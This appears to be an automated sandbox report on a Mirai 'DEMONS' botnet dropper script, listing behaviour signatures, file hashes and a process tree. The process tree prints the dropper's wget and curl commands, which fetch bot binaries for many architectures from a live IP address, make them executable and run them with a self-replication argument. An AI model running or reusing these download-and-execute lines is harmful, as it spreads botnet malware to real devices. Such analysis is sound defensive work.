Overview

overview

10

Static

static

1

e60ffba598...88f.sh

ubuntu-18.04-amd64

10

e60ffba598...88f.sh

debian-9-armhf

10

e60ffba598...88f.sh

debian-9-mips

10

e60ffba598...88f.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    136s
  • max time network
    148s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    08/03/2025, 14:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh

  • Size

    2KB

  • MD5

    6aea9de4b1853e6a5cea8ad020f48398

  • SHA1

    20e44372765f05e6899aa9bd7e4d9ff64f59c2f7

  • SHA256

    e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f

  • SHA512

    4cb78d553f9ae66e591534a047163ba9db0e54261266c700be091b4ddfe773de2e194f3b80916d40830d1d26f6a76912191fd01858922599fa2b88ca0c70d5a2

Score
10/10
miraidemonsbotnetdefense_evasiondiscovery

Malware Config

Extracted

Family

mirai

Botnet

DEMONS

Extracted

Family

mirai

Botnet

DEMONS

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 13 IoCs
  • Modifies Watchdog functionality 1 TTPs 22 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 10 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Writes file to system bin folder 11 IoCs
  • Changes its process name 11 IoCs
  • Reads system network configuration 1 TTPs 10 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 13 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 27 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh
    /tmp/e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh
    1⤵
    • Executes dropped EXE
    • Writes file to tmp directory
    PID:711
    • /usr/bin/wget
      wget http://176.100.37.236/LjEZs/uYtea.x86
      2⤵
      • Writes file to tmp directory
      PID:715
    • /usr/bin/curl
      curl -O http://176.100.37.236/LjEZs/uYtea.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:731
    • /bin/cat
      cat uYtea.x86
      2⤵
        PID:740
      • /bin/chmod
        chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.x86 x
        2⤵
        • File and Directory Permissions Modification
        PID:741
      • /tmp/x
        ./x SSH.Selfrep
        2⤵
          PID:742
        • /usr/bin/wget
          wget http://176.100.37.236/LjEZs/uYtea.mips
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:744
        • /usr/bin/curl
          curl -O http://176.100.37.236/LjEZs/uYtea.mips
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:746
        • /bin/cat
          cat uYtea.mips
          2⤵
          • System Network Configuration Discovery
          PID:747
        • /bin/chmod
          chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.mips uYtea.x86 x
          2⤵
          • File and Directory Permissions Modification
          PID:748
        • /tmp/x
          ./x SSH.Selfrep
          2⤵
            PID:749
          • /usr/bin/wget
            wget http://176.100.37.236/LjEZs/uYtea.mpsl
            2⤵
            • Writes file to tmp directory
            PID:751
          • /usr/bin/curl
            curl -O http://176.100.37.236/LjEZs/uYtea.mpsl
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:752
          • /bin/cat
            cat uYtea.mpsl
            2⤵
              PID:753
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.mips uYtea.mpsl uYtea.x86 x
              2⤵
              • File and Directory Permissions Modification
              PID:754
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Writes file to system bin folder
              • Changes its process name
              PID:755
            • /usr/bin/wget
              wget http://176.100.37.236/LjEZs/uYtea.arm
              2⤵
              • Writes file to tmp directory
              PID:757
            • /usr/bin/curl
              curl -O http://176.100.37.236/LjEZs/uYtea.arm
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:759
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.arm uYtea.mips uYtea.mpsl uYtea.x86 x
              2⤵
              • File and Directory Permissions Modification
              PID:761
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:762
            • /usr/bin/wget
              wget http://176.100.37.236/LjEZs/uYtea.arm5
              2⤵
              • Writes file to tmp directory
              PID:810
            • /usr/bin/curl
              curl -O http://176.100.37.236/LjEZs/uYtea.arm5
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:811
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh systemd-private-083a7e13656d4bb3b264999a4b77ae06-systemd-timedated.service-AyVL77 uYtea.arm uYtea.arm5 uYtea.mips uYtea.mpsl uYtea.x86 x
              2⤵
              • File and Directory Permissions Modification
              PID:813
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:814
            • /usr/bin/wget
              wget http://176.100.37.236/LjEZs/uYtea.arm6
              2⤵
              • Writes file to tmp directory
              PID:820
            • /usr/bin/curl
              curl -O http://176.100.37.236/LjEZs/uYtea.arm6
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:821
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.mips uYtea.mpsl uYtea.x86 x
              2⤵
              • File and Directory Permissions Modification
              PID:829
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:830
            • /usr/bin/wget
              wget http://176.100.37.236/LjEZs/uYtea.arm7
              2⤵
              • Writes file to tmp directory
              PID:856
            • /usr/bin/curl
              curl -O http://176.100.37.236/LjEZs/uYtea.arm7
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:858
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.x86 x
              2⤵
              • File and Directory Permissions Modification
              PID:860
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:861
            • /usr/bin/wget
              wget http://176.100.37.236/LjEZs/uYtea.ppc
              2⤵
              • Writes file to tmp directory
              PID:863
            • /usr/bin/curl
              curl -O http://176.100.37.236/LjEZs/uYtea.ppc
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:865
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x
              2⤵
              • File and Directory Permissions Modification
              PID:867
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:868
            • /usr/bin/wget
              wget http://176.100.37.236/LjEZs/uYtea.m68k
              2⤵
              • Writes file to tmp directory
              PID:870
            • /usr/bin/curl
              curl -O http://176.100.37.236/LjEZs/uYtea.m68k
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:872
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.x86 x
              2⤵
              • File and Directory Permissions Modification
              PID:874
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:875
            • /usr/bin/wget
              wget http://176.100.37.236/LjEZs/uYtea.sh4
              2⤵
              • Writes file to tmp directory
              PID:877
            • /usr/bin/curl
              curl -O http://176.100.37.236/LjEZs/uYtea.sh4
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:879
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.x86 x
              2⤵
              • File and Directory Permissions Modification
              PID:881
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:882
            • /usr/bin/wget
              wget http://176.100.37.236/LjEZs/uYtea.spc
              2⤵
              • Writes file to tmp directory
              PID:884
            • /usr/bin/curl
              curl -O http://176.100.37.236/LjEZs/uYtea.spc
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:886
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x
              2⤵
              • File and Directory Permissions Modification
              PID:888
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:889
            • /usr/bin/wget
              wget http://176.100.37.236/LjEZs/uYtea.arc
              2⤵
              • Writes file to tmp directory
              PID:891
            • /usr/bin/curl
              curl -O http://176.100.37.236/LjEZs/uYtea.arc
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:893
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 x
              2⤵
              • File and Directory Permissions Modification
              PID:895
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:896
            • /usr/bin/wget
              wget http://176.100.37.236/LjEZs/uYtea.x86_64
              2⤵
              • Writes file to tmp directory
              PID:898
            • /usr/bin/curl
              curl -O http://176.100.37.236/LjEZs/uYtea.x86_64
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:900
            • /bin/chmod
              chmod +x e60ffba5989232a11be2a879fef11d0ad899d96a00d0173828c80c4f12e9688f.sh uYtea.arc uYtea.arm uYtea.arm5 uYtea.arm6 uYtea.arm7 uYtea.m68k uYtea.mips uYtea.mpsl uYtea.ppc uYtea.sh4 uYtea.spc uYtea.x86 uYtea.x86_64 x
              2⤵
              • File and Directory Permissions Modification
              PID:902
            • /tmp/x
              ./x SSH.Selfrep
              2⤵
              • Modifies Watchdog functionality
              • Enumerates active TCP sockets
              • Writes file to system bin folder
              • Changes its process name
              • Reads system network configuration
              PID:903

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • /tmp/uYtea.x86
            Filesize

            54KB

            MD5

            e8ee0839bb7869765d80e4280d585222

            SHA1

            e0aa7ad73b70d2fbd0f8f4ca2d5ca417c6e36538

            SHA256

            34537b3ae42d5d93060f42ccd019a8e976290a01b0380e6688a2dfa1515cd1a6

            SHA512

            a3570f2617a4ed149c1a8a8a396a2d0522c09551ab54ef7c7b882c71b66ac3cd9246e552b6acaceeb2585c337bee9e471af729dee5a08f9a491ab14a6c72f02b

            Download Submit

          • /tmp/x
            Filesize

            75KB

            MD5

            e22278172a0f989dcd639152d1f7bdda

            SHA1

            5ef82abd4a65994779ed81263e4495aa2a1fc0a0

            SHA256

            c21056260e2db4b9f6dc025dfa6286ef2865b3b4f43a4633a7653499b63f20d3

            SHA512

            686e0967c54a58d086e279d2b3d3aedbc604221b802c2fbf2ec4d55acc681eefcbf1edd236828c257350d5f75694d0dd4a98d35c8e7fa247ebe1dc4bc211e74e

            Download Submit

          • /tmp/x
            Filesize

            75KB

            MD5

            d40b08390f13aa89c14e0fedff56e41f

            SHA1

            7f5f215fef320e6677f9490dff7732d46f157af9

            SHA256

            10a4c1b8a7106008acb65a31ab3d078f7b056eb30e4397f8b7a09b39855d23ea

            SHA512

            e385eb0f4a06f0264bc5f0b95ffb83673834e3ffb267f947c264f2ccb5017bdee416b6e7c158ed1ef066d14f26eddc7426ab0313fc4de4948fbefb51637be7a6

            Download Submit